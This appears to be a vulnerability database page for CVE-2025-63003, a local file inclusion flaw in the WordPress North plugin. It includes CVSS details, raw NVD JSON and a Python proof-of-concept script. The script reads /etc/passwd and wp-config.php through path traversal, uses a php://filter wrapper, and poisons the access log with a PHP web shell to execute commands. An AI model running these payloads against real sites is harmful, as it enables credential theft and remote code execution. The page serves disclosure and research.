Security Vulnerability Report
中文
CVE-2025-63003 CVSS 7.5 HIGH

CVE-2025-63003

Published: 2025-12-09 16:18:05
Last Modified: 2026-04-15 00:35:42

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in fuelthemes North - Required Plugin north-plugin allows PHP Local File Inclusion.This issue affects North - Required Plugin: from n/a through <= 1.4.2.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

north-plugin <= 1.4.2 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63003 PoC - Local File Inclusion in WordPress North Plugin # Affected: north-plugin <= 1.4.2 import requests import urllib.parse target_url = "http://target-site.com/" # PoC 1: Basic LFI to read /etc/passwd def test_lfi_basic(): """Basic LFI test to read system files""" params = { 'file': '../../../../../../etc/passwd', 'action': 'north_include' } response = requests.get(target_url, params=params) if 'root:' in response.text: print('[+] LFI Confirmed - /etc/passwd readable') return response.text # PoC 2: Read WordPress config file def test_wp_config(): """Read WordPress configuration with database credentials""" params = { 'file': '../../wp-config.php', 'action': 'north_include' } response = requests.get(target_url, params=params) if 'DB_NAME' in response.text: print('[+] WordPress config file readable') return response.text # PoC 3: PHP Filter wrapper to read source code def test_php_filter(): """Use PHP filter wrapper to read encoded source files""" encoded_path = urllib.parse.quote('php://filter/read=convert.base64-encode/resource=../../wp-config.php') params = { 'file': encoded_path, 'action': 'north_include' } response = requests.get(target_url, params=params) print('[+] Attempting PHP filter wrapper technique') return response.text # PoC 4: Authenticated RCE via log poisoning (if combined with other vulns) def test_log_poisoning(): """Log poisoning technique for RCE (requires additional conditions)""" # Inject PHP code into access log log_poison = "<?php system($_GET['cmd']); ?>" headers = {'User-Agent': log_poison} requests.get(target_url, headers=headers) # Execute command via LFI exec_params = { 'file': '../../../../var/log/apache2/access.log', 'action': 'north_include', 'cmd': 'id' } response = requests.get(target_url, params=exec_params) return response.text if __name__ == '__main__': print('Testing CVE-2025-63003') test_lfi_basic() test_wp_config()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63003", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:05.493", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in fuelthemes North - Required Plugin north-plugin allows PHP Local File Inclusion.This issue affects North - Required Plugin: from n/a through <= 1.4.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/north-plugin/vulnerability/wordpress-north-required-plugin-plugin-1-4-2-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}